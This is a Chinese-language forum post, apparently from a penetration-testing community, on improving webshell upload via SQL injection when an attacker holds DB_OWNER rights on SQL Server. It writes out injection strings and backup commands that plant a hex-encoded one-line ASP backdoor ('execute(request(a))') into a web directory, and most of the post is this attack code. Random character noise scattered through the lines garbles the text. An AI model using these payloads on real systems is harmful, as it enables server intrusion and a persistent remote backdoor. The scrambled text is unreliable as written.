中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进办法 [打印本页]

作者: admin    时间: 2012-11-9 21:31
标题: DB_OWNER权限得到webshell的改进办法
DB_OWNER权限得到webshell的两点改进:" I; p# D( Q% M" W1 @& R3 V

" r! o8 y( e) X  s! }/ Q* W7 [减少备份文件大小,得到可执行的webshell成功率提高不少3 V5 x) Q% b; `* {% b
一利用差异备份3 Z0 k* }/ K* }1 i+ k
加一个参数WITH DIFFERENTIAL9 ]) d3 Z, `( X8 M/ z

3 k. e  g' t& e! R( ]1* j! W& ]- g1 v8 F
24 v" P5 Z& p+ X6 v
3
3 N# ~- _6 l" ~4
( v. g7 k) e( C3 x- L6 N declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s- S, c" G6 a( w3 c
create table [dbo].[xiaolu] ([cmd] [image]);# S9 u1 R& S/ F3 |
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
1 k4 K  Q& O. N  u! {5 u- udeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL $ u' h0 H# K# e$ F- z0 Z; S
6 v9 ~# \: r' s% v
二利用完全FORMAT
( B9 A: x* t5 {* \7 \! e' T) l& F加一个参数WITH FROMAT+ a" T3 o# X1 i; g% z: Z$ V: J; O
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以/ A0 O6 l/ U8 O5 L; Y
! I, R4 a; ]4 o3 d) O! @
1
4 x  j0 `+ O0 g. \0 m2; I- j; o; V7 g: f6 K
3
9 s- N0 b, l7 ^$ j$ _4
; W7 T2 O+ q% M0 C declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s+ d7 m$ i5 u; ^* P, p
create table [dbo].[xiaolu] ([cmd] [image]);
7 [- D1 q+ q; |, sinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
  ~# h& i( f# V6 L$ R7 J! gdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
8 v) L# _% G" {2 i' z  K. Z) i2 v7 ?
0 h3 ~9 w/ c, t4 a7 `% r4 i总的来说就是那么简单几句,下面以备份数据库model为例子' x, n8 F: P* h
1
( f, ~/ h4 w. d& w4 U8 B: x8 T8 x' l6 d4 C8 \
1$ T9 B1 c+ L+ J% d+ g
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
4 A. k$ S1 Z3 {  e4 F6 e* X' A$ I
# U5 A) y( u% V3 Z24 s4 p) k5 g$ q

! s5 T1 i  e2 S1
. F+ q9 ~# X1 R' K; _' x id=1;backup database model to disk='你的路径‘ with differential,format;--
( v0 ?4 {6 b/ A/ c




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2